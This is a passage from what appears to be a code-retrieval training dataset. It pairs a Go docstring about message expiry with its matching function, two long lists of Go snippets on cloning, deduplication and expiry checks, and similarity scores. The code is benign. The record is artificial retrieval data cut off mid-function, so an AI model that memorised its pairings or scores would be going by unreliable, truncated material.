dbh.Add(DB, collection, \"duplicate/object\", obj)\n\tExpect(err).ShouldNot(BeNil())\n\tExpect(err.Error()).Should(ContainSubstring(\"duplicate key error\"))\n}", "func (x *fastReflection_DuplicateVoteEvidence) New() protoreflect.Message {\n\treturn new(fastReflection_DuplicateVoteEvidence)\n}", "func BenchmarkDupMap(b *testing.B) {\n\tdupInit(b)\n\tfor n := 0; n < b.N; n++ {\n\t\tdupIntMapData.Dup()\n\t}\n}", "func (q *Queue) Copy(mType int64) (*Message, error) {\n\tq.mu.Lock()\n\tdefer q.mu.Unlock()\n\n\tif mType < 0 || q.messages.Empty() {\n\t\treturn nil, linuxerr.ENOMSG\n\t}\n\n\tmsg := q.msgAtIndex(mType)\n\tif msg == nil {\n\t\treturn nil, linuxerr.ENOMSG\n\t}\n\treturn msg.makeCopy(), nil\n}", "func (request *DomainRegisterRequest) Clone() base.IProxyMessage {\n\tdomainRegisterRequest := NewDomainRegisterRequest()\n\tvar messageClone base.IProxyMessage = domainRegisterRequest\n\trequest.CopyTo(messageClone)\n\n\treturn messageClone\n}", "func (pk PacketBufferPtr) IncRef() PacketBufferPtr {\n\tpk.packetBufferRefs.IncRef()\n\treturn pk\n}", "func RemDup(names []Name) []Name {\n\tm := make(map[string]bool)\n\tfor _, name := range names {\n\t\tif _, seen := m[name.Name()]; !seen {\n\t\t\tnames[len(m)] = name\n\t\t\tm[name.Name()] = true\n\t\t}\n\t}\n\treturn names[:len(m)]\n}", "func (mq *MessageQueue) Copy() *MessageQueue {\n\tnewConnection := MessageQueue{\n\t\tConnection: mq.Connection,\n\t\tChannel: mq.Channel,\n\t}\n\treturn &newConnection\n}", "func dup(buf []byte) []byte {\n\treturn append([]byte{}, buf...)\n}", "func dup(buf []byte) []byte {\n\treturn append([]byte{}, buf...)\n}", "func cloneMessage(kind string, kinds map[string]proto.Message) (proto.Message, error) {\n\tmsg, ok := kinds[kind]\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"unrecognized kind %q\", kind)\n\t}\n\treturn proto.Clone(msg), nil\n}", "func (d *dupper) DupAttribute(att *AttributeDefinition) *AttributeDefinition {\n\tvar valDup *dslengine.ValidationDefinition\n\tif att.Validation != nil {\n\t\tvalDup = att.Validation.Dup()\n\t}\n\tdup := AttributeDefinition{\n\t\tType: att.Type,\n\t\tDescription: att.Description,\n\t\tValidation: valDup,\n\t\tMetadata: att.Metadata,\n\t\tDefaultValue: att.DefaultValue,\n\t\tNonZeroAttributes: att.NonZeroAttributes,\n\t\tView: att.View,\n\t\tDSLFunc: att.DSLFunc,\n\t\tExample: att.Example,\n\t}\n\treturn &dup\n}", "func TestMerge_Duplicate(t *testing.T) {\n\tpncounter1 := PNCounter{\n\t\tAdd: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t\tDelete: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t}\n\tpncounter2 := PNCounter{\n\t\tAdd: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t\tDelete: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t}\n\tpncounter3 := PNCounter{\n\t\tAdd: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t\tDelete: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t}\n\n\tpncounterExpected := PNCounter{\n\t\tAdd: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t\tDelete: gcounter.GCounter{map[string]int{\"node1\": 3, \"node2\": 5, \"node3\": 7}},\n\t}\n\n\tpncounterActual := Merge(pncounter1, pncounter2, pncounter3)\n\n\tcountExpected := 0\n\tcountActual := pncounterActual.GetTotal()\n\n\tassert.Equal(t, pncounterExpected, pncounterActual)\n\tassert.Equal(t, countExpected, countActual)\n\n\tpncounter = pncounter.Clear(testNode)\n}", "func (mw *Writer) DedupWriteIsDup(v interface{}) (res bool, err error) {\n\tdefer func() {\n\t\t// This recover allows test 911 (_generated/gen_test.go:67) to run green.\n\t\t// It turns indexing by []byte msgp.Raw into a no-op. Which it\n\t\t// should be.\n\t\tif recover() != nil {\n\t\t\treturn\n\t\t}\n\t}()\n\tif v == nil || reflect.ValueOf(v).IsNil() {\n\t\treturn false, nil\n\t}\n\tk, dup := mw.ptrWrit[v]\n\tif !dup {\n\t\tmw.ptrWrit[v] = mw.ptrCountNext\n\t\t//fmt.Printf(\"\\n\\n $$$ NOT dup write %p -> k=%v / %#v\\n\\n\", v, mw.ptrCountNext, v)\n\t\tmw.ptrCountNext++\n\t\treturn false, nil\n\t} else {\n\t\t//fmt.Printf(\"\\n\\n $$$ DUP write %p -> k=%v / %#v\\n\\n\", v, k, v)\n\t}\n\treturn true, mw.DedupWriteExt(k)\n}", "func (n *Node) RemoveDups1() {\n\t// i'm pretty sure this doesn't count as a temp buffer i'm not holding\n\t// data to move from one stop to another\n\tm := make(map[int]struct{})\n\tfor n.Next != nil {\n\t\tif _, ok := m[n.Data]; ok {\n\t\t\t// pointers is needed to make sure data is overwritten\n\t\t\t*n = *deleteNode(n, n.Data)\n\t\t} else {\n\t\t\tm[n.Data] = struct{}{}\n\t\t\tn = n.Next\n\t\t}\n\t}\n}", "func (p *Pie) Clone(generateNewID bool) *Pie {\n\tcloned := *p\n\tif generateNewID {\n\t\tcloned.Id = bson.NewObjectId()\n\t}\n\tcloned.Slices = make([]Slice, len(p.Slices))\n\tcopy(cloned.Slices, p.Slices)\n\treturn &cloned\n}", "func messageAddNew(msg string) (Message, error) {\n\t//Initialize temp structure to be able to use append function\n\ttmpMessage := Message{}\n\n\tlastId += 1\n\ttmpMessage.Id = lastId\n\ttmpMessage.Message = msg\n\n\tmessages = append(messages, tmpMessage)\n\n\treturn tmpMessage, nil\n}", "func (pk PacketBufferPtr) Clone() PacketBufferPtr {\n\tnewPk := pkPool.Get().(*PacketBuffer)\n\tnewPk.reset()\n\tnewPk.buf = pk.buf.Clone()\n\tnewPk.reserved = pk.reserved\n\tnewPk.pushed = pk.pushed\n\tnewPk.consumed = pk.consumed\n\tnewPk.headers = pk.headers\n\tnewPk.Hash = pk.Hash\n\tnewPk.Owner = pk.Owner\n\tnewPk.GSOOptions = pk.GSOOptions\n\tnewPk.NetworkProtocolNumber = pk.NetworkProtocolNumber\n\tnewPk.dnatDone = pk.dnatDone\n\tnewPk.snatDone = pk.snatDone\n\tnewPk.TransportProtocolNumber = pk.TransportProtocolNumber\n\tnewPk.PktType = pk.PktType\n\tnewPk.NICID = pk.NICID\n\tnewPk.RXChecksumValidated = pk.RXChecksumValidated\n\tnewPk.NetworkPacketInfo = pk.NetworkPacketInfo\n\tnewPk.tuple = pk.tuple\n\tnewPk.InitRefs()\n\treturn newPk\n}", "func (recv *Value) DupParam() *ParamSpec {\n\tretC := C.g_value_dup_param((*C.GValue)(recv.native))\n\tretGo := ParamSpecNewFromC(unsafe.Pointer(retC))\n\n\treturn retGo\n}", "func (r *Network) CheckDuplicate() pulumi.BoolOutput {\n\treturn (pulumi.BoolOutput)(r.s.State[\"checkDuplicate\"])\n}", "func createNewPrivateMessage(origin string, msg string, dest *string) *core.PrivateMessage {\n\tdefaultID := uint32(0) // to enforce NOT sequencing\n\tdefaultHopLimit := uint32(10)\n\tprivateMsg := core.PrivateMessage{Origin: origin, ID: defaultID, Text: msg, Destination: *dest, HopLimit: defaultHopLimit}\n\treturn &privateMsg\n}", "func NewRepeated(less LessFunc) *List {\n\tl := New(less)\n\tl.repeat = true\n\treturn l\n}", "func DuplicateDirectiveMessage(directiveName string) string {\n\treturn fmt.Sprintf(`The directive \"%s\" can only be used once at this location.`, directiveName)\n}", "func TestRawCred_AddDuplicate(t *testing.T) {\n\tc := NewRawCred(NewAttrCount(2, 0, 0))\n\t_ = c.addEmptyInt64Attr(\"a\", 0, true)\n\terr := c.addEmptyInt64Attr(\"a\", 0, false)\n\tassert.Error(t, err)\n}", "func (me *Container) Duplicate(r ...Registries) *Container {\n\tinstance := Container{sync.Mutex{}, make(map[string]interface{})}\n\n\tfor k, v := range globalContainerInstance.Container.bag {\n\t\tinstance.bag[k] = v\n\t}\n\n\tif len(r) > 0 {\n\t\tfor _, v := range r {\n\t\t\tinstance.Register(v)\n\t\t}\n\t}\n\n\treturn &instance\n}", "func (c *Client) Clone() *Client {\n\tnc := *c\n\tnc.h = nil\n\tif len(c.h) > 0 {\n\t\tnc.h = c.h.Clone()\n\t}\n\treturn &nc\n}", "func (d *Data) Copy(n int) *Data {\n\tc := NewData(n)\n\tcopy(c.buf, d.buf)\n\treturn c\n}", "func (op RollupOp) Clone() RollupOp {\n\tidClone := make([]byte, len(op.ID))\n\tcopy(idClone, op.ID)\n\treturn RollupOp{ID: idClone, AggregationID: op.AggregationID}\n}", "func DuplicateFile(n *net_node.Node, filename string, send_to_idx int32) {\n\t// First, determine if the file we are putting actually exists\n\tf, err := os.Stat(filename)\n\tif os.IsNotExist(err) {\n\t\tfmt.Println(filename, \"does not exist ,cant duplicate this file\")\n\t\treturn\n\t}\n\tfile_size := f.Size()\n\n\t// Do not begin writing until we have waited for all\n\t// other writes and reads on the file to finish and notified\n\t// other servers that we are writing\n\n\tacquire_distributed_write_lock(n, filename)\n\n\tSend_file_tcp(n, send_to_idx, filename, filename, file_size, \"\", false)\n\n\t// Send a message to the remaining servers that the file has been put\n\tservers := n.Files[filename].Servers\n\tfor _, idx := range servers {\n\t\tif idx == -1 {\n\t\t\tcontinue\n\t\t}\n\t\tif n.Table[idx].Status != net_node.ACTIVE {\n\t\t\tn.Files[filename].Servers[idx] = send_to_idx\n\t\t}\n\t}\n\tnotify_servers_of_file_put_complete(n, servers, filename, file_size)\n}", "func DuplicateOperationNameMessage(operationName string) string {\n\treturn fmt.Sprintf(`There can be only one operation named \"%s\".`, operationName)\n}", "func NewReplicateTooManyRequests() *ReplicateTooManyRequests {\n\n\treturn &ReplicateTooManyRequests{}\n}", "func NewPossDupFlag(val bool) PossDupFlagField {\n\treturn PossDupFlagField{quickfix.FIXBoolean(val)}\n}", "func (bh *Header) Clone() *Header {\n\tc := &Header{\n\t\tVersion: bh.Version,\n\t\tSortOrder: bh.SortOrder,\n\t\tGroupOrder: bh.GroupOrder,\n\t\totherTags: append([]tagPair(nil), bh.otherTags...),\n\t\tComments: append([]string(nil), bh.Comments...),\n\t\tseenRefs: make(set, len(bh.seenRefs)),\n\t\tseenGroups: make(set, len(bh.seenGroups)),\n\t\tseenProgs: make(set, len(bh.seenProgs)),\n\t}\n\tif len(bh.refs) != 0 {\n\t\tc.refs = make([]*Reference, len(bh.refs))\n\t}\n\tif len(bh.rgs) != 0 {\n\t\tc.rgs = make([]*ReadGroup, len(bh.rgs))\n\t}\n\tif len(bh.progs) != 0 {\n\t\tc.progs = make([]*Program, len(bh.progs))\n\t}\n\n\tfor i, r := range bh.refs {\n\t\tif r == nil {\n\t\t\tcontinue\n\t\t}\n\t\tc.refs[i] = new(Reference)\n\t\t*c.refs[i] = *r\n\t\tc.refs[i].owner = c\n\t}\n\tfor i, r := range bh.rgs {\n\t\tc.rgs[i] = new(ReadGroup)\n\t\t*c.rgs[i] = *r\n\t\tc.rgs[i].owner = c\n\t}\n\tfor i, p := range bh.progs {\n\t\tc.progs[i] = new(Program)\n\t\t*c.progs[i] = *p\n\t\tc.progs[i].owner = c\n\t}\n\tfor k, v := range bh.seenRefs {\n\t\tc.seenRefs[k] = v\n\t}\n\tfor k, v := range bh.seenGroups {\n\t\tc.seenGroups[k] = v\n\t}\n\tfor k, v := range bh.seenProgs {\n\t\tc.seenProgs[k] = v\n\t}\n\n\treturn c\n}", "func (a *AttributeDefinition) Dup() *AttributeDefinition {\n\tvalDup := make([]ValidationDefinition, len(a.Validations))\n\tfor i, v := range a.Validations {\n\t\tvalDup[i] = v\n\t}\n\tdupType := a.Type\n\tif dupType != nil {\n\t\tdupType = dupType.Dup()\n\t}\n\tdup := AttributeDefinition{\n\t\tType: dupType,\n\t\tDescription: a.Description,\n\t\tAPIVersions: a.APIVersions,\n\t\tValidations: valDup,\n\t\tMetadata: a.Metadata,\n\t\tDefaultValue: a.DefaultValue,\n\t\tNonZeroAttributes: a.NonZeroAttributes,\n\t\tView: a.View,\n\t\tDSLFunc: a.DSLFunc,\n\t}\n\treturn &dup\n}", "func (v CollectRewards) Copy() StakeMsg {\n\tv1 := v\n\treturn v1\n}", "func (err *DuplicatedRecord) WithMessage(msg string) *DuplicatedRecord {\n\terr.Message = msg\n\treturn err\n}", "func DupAtt(att *AttributeDefinition) *AttributeDefinition {\n\treturn newDupper().DupAttribute(att)\n}", "func (ncp *NodeConnPipe) Push(m *Message) {\n\tm.Add()\n\tvar input chan *Message\n\tncp.l.RLock()\n\tif ncp.state == opened {\n\t\tif ncp.conns == 1 {\n\t\t\tinput = ncp.inputs[0]\n\t\t} else {\n\t\t\treq := m.Request()\n\t\t\tif req != nil {\n\t\t\t\tcrc := int32(hashkit.Crc16(req.Key()))\n\t\t\t\tinput = ncp.inputs[crc%ncp.conns]\n\t\t\t} else {\n\t\t\t\t// NOTE: impossible!!!\n\t\t\t}\n\t\t}\n\t}\n\tncp.l.RUnlock()\n\tif input != nil {\n\t\tselect {\n\t\tcase input <- m:\n\t\t\tm.MarkStartInput()\n\t\t\treturn\n\t\tdefault:\n\t\t}\n\t}\n\tm.WithError(errPipeChanFull)\n\tm.Done()\n}", "func NewSupportResourceDuplicate() Support {\n\tret := NewSupport()\n\tret.ID = SupportResourceDuplicate\n\tret.Reason = \"The resource duplication happend inside.\"\n\tret.Solution = \"Stop create the duplicated resource.\"\n\treturn ret\n}", "func DuplicateMT(mt *MT) *MT {\n\tnewMT := MT{}\n\tfor i := 0; i < n; i++ {\n\t\tnewMT.state[i] = Untemper(mt.Next())\n\t}\n\treturn &newMT\n}", "func (reply *DomainDescribeReply) Clone() base.IProxyMessage {\n\tdomainDescribeReply := NewDomainDescribeReply()\n\tvar messageClone base.IProxyMessage = domainDescribeReply\n\treply.CopyTo(messageClone)\n\n\treturn messageClone\n}", "func NewDuplicator(cfg BatchConfig) *Duplicator {\n\treturn &Duplicator{cfg}\n}", "func (lvl *ColLevel) Duplicate(n int) {\n\tarchive := make([]string, len(lvl.Labels))\n\tcopy(archive, lvl.Labels)\n\tfor i := 0; i < n; i++ {\n\t\tlvl.Labels = append(lvl.Labels, archive...)\n\t\tlvl.Refresh()\n\t}\n}", "func makeDup(size int64) exec_func {\n\treturn func(pc *uint64, in *interpreter, ctx *callCtx) uint64 {\n\n\t\tctx.stack.Dup(int(size))\n\t\treturn 0\n\t}\n}" ]
[ "0.6534085", "0.54666907", "0.5392197", "0.5277368", "0.5169085", "0.5128281", "0.50643915", "0.5006668", "0.50032216", "0.49683774", "0.49560294", "0.48899946", "0.4889048", "0.48835996", "0.48802045", "0.4869459", "0.4795192", "0.47699422", "0.47657543", "0.47597653", "0.47290885", "0.47226346", "0.47120607", "0.4675661", "0.46724758", "0.46691847", "0.46666595", "0.46577767", "0.46576732", "0.46450013", "0.46381736", "0.46362317", "0.46349502", "0.4600299", "0.45996696", "0.4568262", "0.4564289", "0.45540118", "0.45409572", "0.4529951", "0.45256191", "0.45103735", "0.44902554", "0.4485025", "0.44710422", "0.44598654", "0.4448692", "0.44483483", "0.4427548", "0.44168383", "0.44164747", "0.43993783", "0.4381097", "0.43799356", "0.43726385", "0.43712613", "0.43683794", "0.43556258", "0.4345692", "0.43439683", "0.43401837", "0.4335963", "0.43236038", "0.43200532", "0.42966276", "0.42966276", "0.4294268", "0.42809126", "0.428088", "0.4269559", "0.42606926", "0.42335987", "0.42326212", "0.42325532", "0.42296752", "0.422954", "0.42289263", "0.42191076", "0.42101088", "0.42067444", "0.41964892", "0.4185444", "0.41821793", "0.4166861", "0.41658247", "0.41608438", "0.41570237", "0.41562694", "0.4146656", "0.41460556", "0.41374576", "0.41311795", "0.4118499", "0.4116832", "0.4112149", "0.40873152", "0.40860376", "0.4078581", "0.4072487", "0.4072293" ]
0.72607046
0
Expired returns true if the message has "expired". This is used by transport implementations to discard messages that have been stuck in the write queue for too long, and should be discarded rather than delivered across the transport. This is only used on the TX path, there is no sense of "expiration" on the RX path.
func (m *Message) Expired() bool { if m.expire.IsZero() { return false } if m.expire.After(time.Now()) { return false } return true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Attachment) HasExpired() bool {\n\tvar validTime = m.SigningTime.Add(time.Duration(m.SigningMinutes) * time.Minute)\n\treturn validTime.Unix() < time.Now().Unix()\n}", "func (q *queueData) expired() bool {\n\treturn q.ExpireAt < time.Now().Unix()\n}", "func (r *Record) IsExpired() bool {\n\treturn IsExpired(r.H.Meta.TTL, r.H.Meta.Timestamp)\n}", "func (w *writer) isExpired(now time.Time) bool {\n\tif w.count == 0 {\n\t\treturn false\n\t}\n\tif w.expiryTime == nil {\n\t\treturn false\n\t}\n\treturn w.expiryTime.Before(now)\n}", "func (s *subscription) IsExpired() bool {\n\treturn s.ExpiresAt.Before(time.Now())\n}", "func (upload *Upload) IsExpired() bool {\n\tif upload.ExpireAt != nil {\n\t\tif time.Now().After(*upload.ExpireAt) {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (c *CIDOffer) HasExpired() bool {\n\texpiryTime := time.Unix(c.expiry, 0)\n\tnow := time.Now()\n\treturn expiryTime.Before(now)\n}", "func (b *Object) expired() bool {\n\tif b.expire <= 0 {\n\t\treturn false\n\t}\n\n\treturn time.Now().Unix() >= b.expire\n}", "func (s *Session) IsExpired() bool {\n\treturn s.ExpiredAt.Before(time.Now())\n}", "func (item *item) expired() bool {\n\tif item.ttl <= 0 {\n\t\treturn false\n\t}\n\treturn item.expireAt.Before(time.Now())\n}", "func (t *token) IsExpired() bool {\n\tif t == nil {\n\t\treturn true\n\t}\n\treturn t.Expired()\n}", "func (c CachedObject) IsExpired() bool {\r\n\r\n\telapsed := time.Now().Sub(c.CreatedAt.Add(time.Hour * getExpiryTimeInHrs()))\r\n\r\n\tif elapsed > 0.0 {\r\n\t\treturn true\r\n\t}\r\n\r\n\treturn false\r\n}", "func (e *EnvProvider) IsExpired() bool {\n\treturn !e.retrieved\n}", "func (t *MongoDBToken) IsExpired() bool {\n\treturn time.Now().UTC().Unix() >= t.Expired.Unix()\n}", "func (r IABResponse) IsExpired() bool {\n\tswitch {\n\tcase !r.IsValidSubscription():\n\t\treturn false\n\tdefault:\n\t\tnow := time.Now().UnixNano() / int64(time.Millisecond)\n\t\treturn r.SubscriptionPurchase.ExpiryTimeMillis < now\n\t}\n}", "func (err *ValidationError) IsExpired() bool { return err.exp }", "func (item Item) expired() bool {\n\tif item.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn time.Now().UnixNano() > item.Expiration\n}", "func (d *AccessData) IsExpired() bool {\n\treturn d.IsExpiredAt(time.Now())\n}", "func (b *ProviderBasis) IsExpired() bool {\n\tif b.CurrentTime == nil {\n\t\tb.CurrentTime = time.Now\n\t}\n\treturn !b.AlwaysValid && !b.CurrentTime().Before(b.expiration)\n}", "func (i *Item) IsExpired() bool {\n\t//zero means never expire\n\tif i.ExpiresAt.IsZero() {\n\t\treturn false\n\t}\n\treturn time.Now().After(i.ExpiresAt)\n}", "func (i *Item) IsExpired() bool {\n\t//zero means never expire\n\tif i.ExpiresAt.IsZero() {\n\t\treturn false\n\t}\n\treturn time.Now().After(i.ExpiresAt)\n}", "func (t *Token) IsExpired() bool {\n\tif t.Expiry.IsZero() {\n\t\treturn false\n\t}\n\treturn t.Expiry.Round(0).Add(-expiryDelta).Before(timeNow())\n}", "func (card Card) IsExpired() bool {\n\treturn time.Now().After(card.ExpireAt)\n}", "func (s *Session) IsExpired() bool {\n\treturn s.Expires.Before(time.Now())\n}", "func isExpired(expiryBytes []byte) bool {\n\texpiry := &time.Time{}\n\terr := expiry.UnmarshalText(expiryBytes)\n\tif err != nil {\n\t\treturn true\n\t}\n\treturn time.Now().After(*expiry)\n}", "func (exp *ControlleeExpectations) isExpired() bool {\n\treturn clock.RealClock{}.Since(exp.timestamp) > ExpectationsTimeout\n}", "func (s *StoreService) IsExpired(hash string) bool {\n\tif _, found := s.store.Get(hash); found {\n\t\treturn false\n\t}\n\treturn true\n}", "func (tv *TimedValue) IsExpired() bool {\n\treturn tv.IsExpiredAt(time.Now())\n}", "func (a *AssumeRoleProvider) IsExpired() bool {\n\treturn a.expiration.Before(time.Now())\n}", "func (t *Token) Expired() bool {\n\treturn time.Now().Unix() >= t.ExpiredAt\n}", "func (t *BcsUser) HasExpired() bool {\n\tif time.Now().After(t.ExpiresAt) {\n\t\treturn true\n\t}\n\treturn false\n}", "func (c *mockCredentialsProvider) IsExpired() bool {\n\treturn false\n}", "func (p *Permission) IsExpired() (bool, error) {\n\tcreatedAt, err := time.Parse(time.RFC3339, p.CreatedAt)\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"invalid time format for field \\\"created_at\\\": %s\", p.CreatedAt)\n\t}\n\treturn p.TTL >= 0 && time.Since(createdAt) > p.TTL, nil\n}", "func (c *Cache) IsExpired(key string, current int64) bool {\r\n\treturn (current > c.MagicKeys[key].Expiration)\r\n}", "func (d *Driver) Expired() bool {\n\tif d.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn time.Now().UnixNano() > d.Expiration\n}", "func (this *SmtpWorker) TimeoutHasExpired(startTime time.Time) bool {\n\treturn int(time.Since(startTime).Seconds()) > smtpconstants.COMMAND_TIMEOUT_SECONDS\n}", "func (item Item) isExpired() bool {\n\tif item.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn item.Expiration < time.Now().UnixNano()\n}", "func IsExpired(ctx Context, t UnixTime) bool {\n\tblockNow, err := BlockTime(ctx)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"%+v\", err))\n\t}\n\treturn t <= AsUnixTime(blockNow)\n}", "func (session *Session) Expired() bool {\n\treturn time.Now().After(session.ExpiredAt)\n}", "func expired(token *Token) bool {\n\tif token.Expires.IsZero() && len(token.Access) != 0 {\n\t\treturn false\n\t}\n\treturn token.Expires.Add(-expiryDelta).\n\t\tBefore(time.Now())\n}", "func (p *peerAddr) isExpired(timeout time.Duration, curTime time.Time) bool {\n\treturn curTime.Sub(p.lastPing.Value.(time.Time)) >= timeout\n}", "func (r *Reservation) Expired() bool {\n\treturn time.Until(r.DataReservation.ExpirationReservation.Time) <= 0\n}", "func (request *AccessToken) HasExpired() bool {\n\tcurrentTime := time.Now().Unix()\n\treturn currentTime > request.ExpiresAt\n}", "func isExpired(cli *clientv3.Client, ev *clientv3.Event) (bool, error) {\n\tif ev.PrevKv == nil {\n\t\treturn false, nil\n\t}\n\n\tleaseID := clientv3.LeaseID(ev.PrevKv.Lease)\n\tif leaseID == clientv3.NoLease {\n\t\treturn false, nil\n\t}\n\n\tttlResponse, err := cli.TimeToLive(context.Background(), leaseID)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\n\treturn ttlResponse.TTL == -1, nil\n}", "func (tcertBlock *TCertBlock) isExpired() bool {\n\ttsNow := time.Now()\n\tnotAfter := tcertBlock.GetTCert().GetCertificate().NotAfter\n\tpoolLogger.Debugf(\"#isExpired: %s now: %s deadline: %s \\n \", tsNow.Add(fivemin).After(notAfter), tsNow, notAfter)\n\tif tsNow.Add(fivemin).After(notAfter) {\n\t\treturn true\n\t}\n\treturn false\n}", "func (m *VaultCredsProvider) IsExpired() bool {\n\treturn false\n}", "func (task *Task) IsExpired() bool {\n\tswitch task.Schedule.Regularity {\n\tcase apiModels.OneTime, apiModels.Trigger:\n\t\treturn common.ValidTime(time.Now().UTC(), task.RunTimeUTC)\n\tcase apiModels.Recurrent:\n\t\treturn !common.ValidTime(task.Schedule.EndRunTime.UTC(), task.RunTimeUTC)\n\t}\n\treturn true\n}", "func (k Key) IsExpired() bool {\n\texpiry := k.Expires()\n\tif expiry.Equal(timeZero) {\n\t\treturn false\n\t}\n\n\treturn expiry.Before(time.Now().UTC())\n}", "func (item *Item) Expired() bool {\n\tif item.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn time.Now().UnixNano() > item.Expiration\n}", "func (c *cacheExpirationPolicy) IsExpired(entry *cache.TimestampedEntry) bool {\n\treturn c.clock.Now().After(entry.Obj.(*cacheEntry).expiresAt)\n}", "func (r *record) isExpired(now time.Time) bool {\n\tif r.Expires == 0 {\n\t\treturn false\n\t}\n\texpiryDateUTC := time.Unix(r.Expires, 0).UTC()\n\treturn now.UTC().After(expiryDateUTC)\n}", "func (p *SSOCredentialProvider) IsExpired() bool {\n\tt, err := time.Parse(\"2006-01-02T15:04:05UTC\", p.Cache.ExpiresAt)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn t.Before(time.Now())\n}", "func (item Item) Expired() bool {\n\tif item.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn time.Now().UnixNano() > item.Expiration\n}", "func IsExpired(targetDate time.Time, timeAdded time.Duration) bool {\n\treturn time.Since(targetDate.Add(timeAdded)) > 0\n}", "func HasExpired(cloudEvent map[string]interface{}) bool {\n\te, ok := cloudEvent[ExpirationField]\n\tif ok && e != \"\" {\n\t\texpiration, err := time.Parse(time.RFC3339, fmt.Sprintf(\"%s\", e))\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\n\t\treturn expiration.UTC().Before(time.Now().UTC())\n\t}\n\n\treturn false\n}", "func (a *ACLToken) IsExpired(t time.Time) bool {\n\n\t// Check the token has an expiration time before potentially modifying the\n\t// supplied time. This allows us to avoid extra work, if it isn't needed.\n\tif !a.HasExpirationTime() {\n\t\treturn false\n\t}\n\n\t// Check and ensure the time location is set to UTC. This is vital for\n\t// consistency with multi-region global tokens.\n\tif t.Location() != time.UTC {\n\t\tt = t.UTC()\n\t}\n\n\treturn a.ExpirationTime.Before(t) || t.IsZero()\n}", "func (o *OAuth2Config) IsExpired() bool {\n\treturn o.Token == nil || !o.Token.Valid()\n}", "func (s *CacheService) IsExpired(base string) bool {\n\t// No cache? bail.\n\tif cache[base] == nil || (len(cache[base].Rates) <= 0) {\n\t\treturn true\n\t}\n\n\t// Expired cache? bail.\n\tlastUpdated := cache[base].UpdatedAt\n\tif lastUpdated != nil && lastUpdated.Add(cacheTTL).Before(time.Now()) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c *CSRFStore) expired() bool {\n\treturn c.token == nil || time.Now().After(c.token.ExpiresAt)\n\n}", "func (l Info) IsExpired() bool {\n\treturn l.ExpiresAt.Before(time.Now())\n}", "func (p *Pictures) IsExpired() bool {\n\treturn time.Now().After(p.ExpiresAt)\n}", "func (tb *timerBuilder) IsTimerExpired(td *timerDetails, referenceTime time.Time) bool {\n\t// Cql timestamp is in milli sec resolution, here we do the check in terms of second resolution.\n\texpiry := td.TimerSequenceID.VisibilityTimestamp.Unix()\n\treturn expiry <= referenceTime.Unix()\n}", "func HasExpired(dev *schemas.Developer) bool {\n\t// null time or before now\n\treturn dev.Expiration.Equal(time.Time{}) || dev.Expiration.Before(time.Now())\n}", "func (s *Session) Expired(dur time.Duration) bool {\n\treturn time.Now().After(s.lastAccess.Add(dur))\n}", "func (cc *CurrentConditions) Expired() bool {\n\tnow := time.Now()\n\texpired := now.After(cc.RequestTimestamp.Add(UpdateInterval))\n\treturn expired\n}", "func (i *Info) expired(now int64) bool {\n\treturn i.TTLStamp <= now\n}", "func (i *Item) Expired() bool {\n\tif i.Expiration == nil {\n\t\treturn false\n\t}\n\treturn i.Expiration.Before(time.Now())\n}", "func (k KeyData) Expired() bool {\n\tif k.Expiration == 0 {\n\t\treturn false\n\t}\n\n\tdelta := k.GetExpiration()\n\n\tif delta <= 0 {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (j *Service) IsExpired(claims Claims) bool {\n\treturn !claims.VerifyExpiresAt(time.Now().Unix(), true)\n}", "func (l *PersistableLedger) expired(entryTs int64) bool {\n\texpirationTime := time.Now().Unix() - l.expiration\n\treturn entryTs < expirationTime\n}", "func (s *StaticProvider) IsExpired() bool {\n\treturn false\n}", "func (i *info) expired(now int64) bool {\n\treturn i.TTLStamp <= now\n}", "func (v value) expired(c *Cache) bool{\n return time.Since(v.time)>c.expire\n}", "func IsExpired(ttl uint32, timestamp uint64) bool {\n\tif ttl == Persistent {\n\t\treturn false\n\t}\n\n\tnow := time.UnixMilli(time.Now().UnixMilli())\n\texpireTime := time.UnixMilli(int64(timestamp))\n\texpireTime = expireTime.Add(time.Duration(ttl) * time.Second)\n\n\treturn expireTime.Before(now)\n}", "func (a *Assembler) Expired() bool {\n\treturn time.Now().After(a.deadline)\n}", "func leaseExpired(grantedAt time.Time) bool {\n\treturn time.Since(grantedAt).Seconds() > (storagerpc.LeaseSeconds + storagerpc.LeaseGuardSeconds)\n}", "func (e *expirationChecker) Expired(ref ChunkEntry, now model.Time) (bool, []model.Interval) {\n\tuserID := unsafeGetString(ref.UserID)\n\tperiod := e.tenantsRetention.RetentionPeriodFor(userID, ref.Labels)\n\treturn now.Sub(ref.Through) > period, nil\n}", "func (c Choco) Expired() bool {\n\treturn time.Since(c.TimeStamp) > time.Second\n}", "func (f *Cache) Expired() bool {\n\tfi, err := os.Stat(f.Path)\n\tif err != nil {\n\t\treturn true\n\t}\n\n\texpireTime := fi.ModTime().Add(f.MaxAge)\n\treturn time.Now().After(expireTime)\n}", "func (s *Static) IsExpired() bool {\n\treturn false\n}", "func (p *DiscoveryProtocol) requestExpired(req *api.DiscoveryRequest) bool {\n\tnow := uint32(time.Now().Unix())\n\tif req.DiscoveryMsgData.Expiry < now 